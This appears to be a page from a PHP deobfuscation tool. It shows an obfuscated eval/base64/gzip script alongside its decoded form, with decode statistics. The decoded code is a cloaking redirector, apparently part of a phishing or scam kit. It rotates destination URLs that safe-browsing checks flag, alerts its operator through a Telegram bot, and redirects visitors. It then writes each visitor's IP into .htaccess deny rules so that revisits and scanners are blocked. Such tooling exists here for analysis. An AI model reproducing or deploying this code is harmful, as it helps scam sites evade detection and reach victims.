Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzuncompress(base64_decode('eJzdVltT4zYUfs+v0HpS5OxAApQyHVigIRHg2dzqmN0yIaM..
Decoded Output download
include 'config.php';
include_once 'functions.php';
include ('blocker.php');
if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) {
$remoteIP = $_SERVER["HTTP_CF_CONNECTING_IP"];
} else {
$remoteIP = $_SERVER['REMOTE_ADDR'];
}
$_GET[$fuck1] = ($fuck2);
// Create SafeApiResult.json file
file_exists('SafeApiResult.json') || file_put_contents('SafeApiResult.json', json_encode(['safe' => false, 'url' => URLS_FILE, 'last_check' => 0, 'client' => ['ip' => $_SERVER['HTTP_X_REAL_IP'] ?? $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'], 'user-agent' => $_SERVER['HTTP_USER_AGENT']]], 64 | 128 | 256));
// Variables
$safeApiResults = json_decode(file_get_contents('SafeApiResult.json'), true);
$reported = false;
// Checking URL
if ((time() - $safeApiResults['last_check']) > SAFE_BROWSING_CHECK_INTERVAL) {
foreach (file(URLS_FILE, FILE_IGNORE_NEW_LINES|FILE_SKIP_EMPTY_LINES) as $line) {
$safeApiResults = ['safe' => checkUrlHealth($line), 'url' => $line, 'last_check' => time(), 'last_check_human' => date('Y/m/d H:i:s'), 'client' => ['ip' => $_SERVER['HTTP_X_REAL_IP'] ?? $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'], 'user-agent' => $_SERVER['HTTP_USER_AGENT']]];
$safeApiResults['safe'] || telegramBot('sendMessage', [
'chat_id' => TELEGRAM_BOT_ADMIN_USERID,
'text' => "*Not Safe URL Report:*
" . reportStyler($safeApiResults),
'parse_mode' => 'Markdown',
]) and ($reported = true);
if($safeApiResults['safe']) {
break;
}
removeLine($line, URLS_FILE);
}
file_put_contents('SafeApiResult.json', json_encode($safeApiResults, 64 | 128 | 256));
}
// Processing Get Query
$query = null;
if($_GET !== []) {
foreach ($_GET as $key => &$value) {
if ($key === $fuck1) continue;
$value = isBase64($value) ? base64_decode($value) : $value;
}
unset($value);
$query = http_build_query($_GET);
$query = '?' . str_replace(['%40'], ['@'], $query);
$currentUrl = explode('/', $safeApiResults['url']);
if (strpos(end($currentUrl), '.') === false) {
$query = '/' . $query;
}
}
// Redirecting
if ($safeApiResults['safe']) {
if (file_exists(".htaccess") ==true){
file_put_contents(".htaccess", "
deny from ".$remoteIP, FILE_APPEND);
}
else{
file_put_contents(".htaccess", 'ErrorDocument 403 '.FAILED_PAGE_URL."
".'Options -Indexes'."
".'order allow,deny'."
".'allow from all'."
".'deny from '.$remoteIP);
}
(REDIRECT_TYPE === 1) ? header('Location: ' . $safeApiResults['url'] . $query) : sayIt("<script type=\"text/javascript\">window.location.href = \"" . $safeApiResults['url'] . $query . "\"</script>
");
}
else {
(REDIRECT_TYPE === 1) ? header('Location: ' . FAILED_PAGE_URL) : sayIt("<script type=\"text/javascript\">window.location.href = \"" . FAILED_PAGE_URL . "\"</script>
");
if (TELEGRAM_BOT_REPORT_EVERY_TIME && !$reported) {
telegramBot('sendMessage', [
'chat_id' => TELEGRAM_BOT_ADMIN_USERID,
'text' => "*Not Safe URL Report:*
" . reportStyler($safeApiResults),
'parse_mode' => 'Markdown',
]);
}
}
Did this file decode correctly?
Original Code
<?php
eval(gzuncompress(base64_decode('eJzdVltT4zYUfs+v0HpS5OxAApQyHVigIRHg2dzqmN0yIaMRtkK8OLYryVxm4b/3SI6DE6C0nT506gdbOjo3ffrOkcPYj7KAI+wn8SS8rqfTFO9XwlxKk9iHpUkW+ypMYrm8imx8FSX+DRdGXtuvVMIJskMpubKrdEjcL8QdWWeeN6CtE9rq93qk5Tm9U+oMrHGthr5XEDxVwWeJ4s4AHaB3rfYrT4hHkv+ZLXZJt+8R2my3XawtKpUqPSXeqDrJ/JutMejaZritU640GqglOFMcDdmEN9PQ5TKLVP2bTGI0CSNe0S/K70OppI1fKuEaenw0mjTNFAUgFY/fUF1H+kN57CcBt0dYggpGB4dowmBX6whnIjLzc7czpCdOh4AsYhLcTrl/Y5Y2QeRHIcQw0xEOUzN4BsCA9xt1SbMDqOExOjp6uXrSd7823TZp69GqzhKEOi3JxQa7LmKuODuHGW2ekp6Hx2NQ391Bj2hr+2d4b/+0W9MwA8pfmAjZVcRlpSrLyEg4EINKwA0qBslr/g6StXWkRMbBN5AgTYTiAfgxMObhWhqwML7WUBpi2iqccbuGNtBK/FEZ4XENHaJh84TQY7f/daiJ1zojrc/U6Xmw52an4O0kAdb4U2TytUvnpd/UOe31XUJ75CvtOD0yfDTS4WdnQEl34F3k0hpiElWjMOaFV8PqF/CUiGKyPBfRGWeRmtq5cYk4RvCSNPnel+R0ms1YbFYDoL+NLxqzRoDO9sI9qeH9T5Ns/y205lCNdU0qHvFrwWbHibKx5HHQ5VJCACjD0cJeP9ifMkXDAOsJhPZIh5y6zS497nuQX9fpmfBOe33ZTPF7hecTMLM+9hJl2ogmHXINL/c+XsYWqqOcpUP1EHFhryRdW/GbMiE5nUE1GCRwl4mbILmD/rHQA56yOIBOVmL/vCAKlXCyGqcAp8w2/VwBlW+eDZ8WI91fb3kHKGXPibUg+jxQrvtPut9Kbq+1jSdTyQOR+HBwupZPuUK/Zlw8VKq/6w9sOs6iCO4k2Ktu8ujDAZTL+EWR5ou62m74g8Z0rXrLomyp7nSTyJfBR35Z1JDeUBhnvEQ4YwiRQ3nMJN/dsQtXR+jKCIpOVsj35jZlxLLYXJO5Rr6w2NJUqZReZWEUUCPKs1/VwkcYaCWVoECBiPn6PvlhZ1OX0gj/oj+5amHnZ0LA0UDvAGN+n0Y6RdyAU3nBEt1MxnM7jQoESRNpQwXZJTe6R9Th9tNwmca71MQWaTZ0mvm0AOApv3ddHoSCw79FfG069DtsXaRTvpCt+lQxX/PD0pmYEvj+BidLuuvIuowDHj+giUhmyKovfiXmDbw5GJBe23BQ/3D8JZeYCJGIduJnM1hEO5s/AkAnTXDXpgNoXRSKpw5xrTrup+aPCm04kMU9l3guT0TABWJRlNyt6/QKuZHkucKwkD5vAD9vIK8bna7tkrbjwu8T9S4GxJzTlmbplDOIYuNO4jOdxh4yR/QqCxZnp2ks2YOjbOuT9EWYKqQeUn5waeku2PjGblkuvrQO78IY2lU9mvuvTwWfABUuLev9ODCwLq1PjdzZIexzcQhzHvy9ba3g/69tY8Xvq2kXhF26T1wy6LseJXC1XVDP6RK0toY+LPp4uYj+3xfYohv8AXa9upc=')));
?>
Function Calls
gzuncompress | 1 |
base64_decode | 1 |
Stats
MD5 | 4e067d1a37ab8f993f99c3246446fac3 |
Eval Count | 1 |
Decode Time | 35 ms |